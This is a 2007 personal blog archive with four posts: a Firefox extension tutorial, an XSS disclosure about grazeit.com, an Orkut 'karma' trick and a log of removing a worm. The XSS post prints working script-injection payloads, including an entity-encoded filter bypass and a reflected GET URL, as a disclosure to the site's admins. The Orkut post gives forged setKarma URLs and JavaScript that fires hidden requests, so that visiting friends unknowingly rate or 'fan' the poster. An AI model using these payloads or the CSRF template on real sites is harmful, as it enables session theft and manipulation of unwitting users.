Wednesday, February 28, 2007
Friday, February 23, 2007
Making a Firefox extension
Intro
This section explains how to basically setup a Firefox extension.
Setting up the development Environment
Before jumping into making extensions, we must set up a development environment.
- Download and install firefox: If you haven't already done so. Download firefox and install. (Link is given on right bottom)
- Make a folder where you are going to make your Extension. Eg: D:\extension\helloworld\
Making the files
Install.rdf
<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:em="http://www.mozilla.org/2004/em-rdf#">
<Description about="urn:mozilla:install-manifest">
<em:id>helloworld@digitalpbk.com</em:id>
<!-- Just an unique id of the form of an email address, need (should) not be any mail address -->
<em:name>Hello World </em:name>
<!-- Name of the extension -->
<em:version>1.0</em:version>
<!-- Version -->
<em:description>Hello World Sample Extension from digitalpbk.com</em:description>
<!-- Description -->
<em:creator>digitalpbk</em:creator>
<!--Editor name-->
<!-- optional items -->
<em:contributor>A person who helped you</em:contributor>
<em:contributor>Another one</em:contributor>
<em:homepageURL>http://digitalpbk.blogspot.com</em:homepageURL>
<!--em:optionsURL>chrome://sampleext/content/settings.xul</em:optionsURL>
<em:aboutURL>chrome://sampleext/content/about.xul</em:aboutURL>
<em:iconURL>chrome://sampleext/skin/mainicon.png</em:iconURL>
<em:updateURL>http://sampleextension.mozdev.org/update.rdf</em:updateURL-->
<!-- Firefox -->
<em:targetApplication>
<Description>
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
<em:minVersion>1.5</em:minVersion>
<em:maxVersion>2.0.0.*</em:maxVersion>
</Description>
</em:targetApplication>
</Description>
</RDF>
Draft
Finally Packaging your skin
If you are familiar with Firefox, extensions are packaged in .xpi files. XPI files are compressed files and can be extracted with archiving programs like WinZip, WinRAR etc after renaming it to .ZIP .
Posted by Arun Prabhakar at 7:44 PM 0 comments
Wednesday, January 24, 2007
XSS on GrazeIt.com
Recently while grazing over the net, I found this site grazeit.com. This is a site which keeps a database of good websites found on the net by netizens.
But there is an XSS hole (Cross site scripting ) on the site which allow users to redirect the page to any desired location.
Of course this hack does not work on the secure browser Mozilla Firefox. If you are not using Firefox, download for free (The link is given bottom right).
Probably you arrived at this page from grazeit.com if you are using Microsoft Internet Explorer!
So how did it work?
Grazeit.com allows <IMG tag with the src attribute.
<img src="javascript:window.location='http://digitalpbk.blogspot.com/'" /> Fixed (No longer works)
<img src="javascript:location='http://digitalpbk.blogspot.com/'" /> Fixed (No longer works)
is all we have to post to get redirected.
Level 2
So the grazeit admins have modified the filter to take care of the above 2 methods. But still the filter isn't good enough for :
<img src=javascr&
#105;pt:alert
('XSS')> />
Fixed
<script src="URL" />fixed
GET Cross site Scripting holes
http://www.grazeit.com/Backpage.asp?BPID=210&FilterBy=tags&FilterTag=%3Cscript%3Ealert('hi')%3C/script%3E&FilterTagID=1325
to Grazeit.com administrators
Great work guys. But please remove this serious security vulnerability as it can be used for more than redirection. It can be used to deface, steal user sessions etc.
Thank you for making Grazeit.com.
How to remove this vulnerablilty?
To remove this vulnerablity you have to strengthen the filters.
To do this, the src tag must be stripped off unacceptable characters or these special characters must be encoded such that the URL would remain the same, but it would not be rendered by the browser as a script.
Happy surfing...
Posted by Arun Prabhakar at 7:31 PM 3 comments
Labels:
Hacks
Bookmark me on :
Tuesday, January 23, 2007
Increasing the karma ratings on Orkut
Trace Back
Followed from : Making more fans on Orkut
Continued ...
"http://www.orkut.com/setKarma?cat=0&val=1&gid=FR[friends id here]/[your id here]"
Eg: "http://www.orkut.com/setKarma? cat=0&val=1&gid=FRUS00000000000/US00123456789"
The above illustrates the page you have to make your friend to access to make he/she your fan.
The same can be modified to increase (can decrease also) your cool, sexy and trusty karma ratings. The cat=0 in the URL specifies the fan function.
cat=1 : stands for trusty rating.
cat=2 : stands for cool rating.
cat=3 : stands for sexy rating.
The next GET parameter val=1 has to be modified as :
val = 0: for 0 rating
val = 1: for 1
val = 2: for 2
val = 3: for full rating.
So our final URL for full trusty rating is :
"http://www.orkut.com/setKarma?cat=1&val=3&gid=FR[friends id here]/[your id here]"
Eg: "http://www.orkut.com/setKarma? cat=1&val=3&gid=FRUS00000000000/US00123456789"
for Cool rating :
"http://www.orkut.com/setKarma?cat=2&val=3&gid=FR[friends id here]/[your id here]"
Eg: "http://www.orkut.com/setKarma? cat=2&val=3&gid=FRUS00000000000/US00123456789"
for Sexy rating :
"http://www.orkut.com/setKarma?cat=3&val=3&gid=FR[friends id here]/[your id here]"
Eg: "http://www.orkut.com/setKarma? cat=3&val=3&gid=FRUS00000000000/US00123456789"
When you are giving all these three in the same page, the 3 get requests must not be sent to the server together. Leave a time delay of about 100ms between each of the GET requests.
You can accomplish this in javascript by the following this template:
function fn(index)
{
var links=new Array("Link 1 for cool/trusty/sexy/fan", "etc fill in");
var i= new Image();
i.src = links[index];
if(index != Count)
{
window.setTimeout("fn("+(index+1)+")",100);
}
else
window.location = "Somewhere"; //Redirect to a nice page.
}
Hope this works for you ....

Did it work ?
Please leave a feedback or comment about other problems you faced ...
Keep orkutting ....
Posted by Arun Prabhakar at 8:36 AM 20 comments
Thursday, January 18, 2007
WORM_RONTOKBRO.Y versus me
This is the log of the war against the worm.
How did the enemy get it ?
It came along a couple of folders which was copied from a pen drive. It had the same folder name and looked exactly like a windows folder. In a hurry double clicked it, and the war began...
Battle 1: End Task
I immediately realized it was a virus because it opened the My Documents folder, which was unusual. Then soon I pressed Ctrl + Alt + Del to end task the program. But the battle was won by the virus, it restarted the computer ! But I got the exe name "eksplorasi.exe".
Battle 2: Regedit
In an effort to save my system, after rebooting tried to run the "regedit" registry editor where most viruses register in the
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
to start when the computer starts. But I failed in the battle again. It has disabled the registery editor.
Battle 3:Safe mode
In the next battle, I rebooted the computer in safe mode (F8 before booting in the OS choice menu and selecting Safe mode). Failed again, virus is as active in safe mode as in normal mode.
Battle 4:Rebooted into Win98
In the next battle booted into windows 98. Searched the entire windows drive for the file "eksplorasi.exe" found 1 in %Windows Directory%\. Deleted it! Next I searched for the entire windows directory for exe's that had the folder as the icon. Amazed by the number of copies it has already produced. Almost another 12-14 copies in various folders. Deleted them all .. Battle won! The enemies where shot down but the consequences remain...
Battle 5:Looked for allies from Google
Found some information.
Searched for eksplorasi.exe manual removal
Battle 6: Capturing back the regedit
Capturing back the regedit was exciting. As hinted by an ally, the regedit was disabled by the following registry entry.
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Policies\System
DisableRegistryTools = "dword:00000001"
By their advice I tried making a reg file that removed this entry. But I failed that battle too.
Battle 7: My own registry editor
Made up a quick registry editor that replaced the registry values to enable the registry again. And it was a success. Captured back the registry from the enemies.
Again from the advice of my ally, all deformations in the registry where restored to the previous state.
Download my registry enabler.
War won
Hurray the war was won by me.
Won a battle? let me know.
Information Allies Missed
+ The virus was present in the System_restore files.
+ Making reg files did not work as registry was disabled.
+ Group Policy gpedit.msc is disabled.
Posted by Arun Prabhakar at 7:58 AM 2 comments
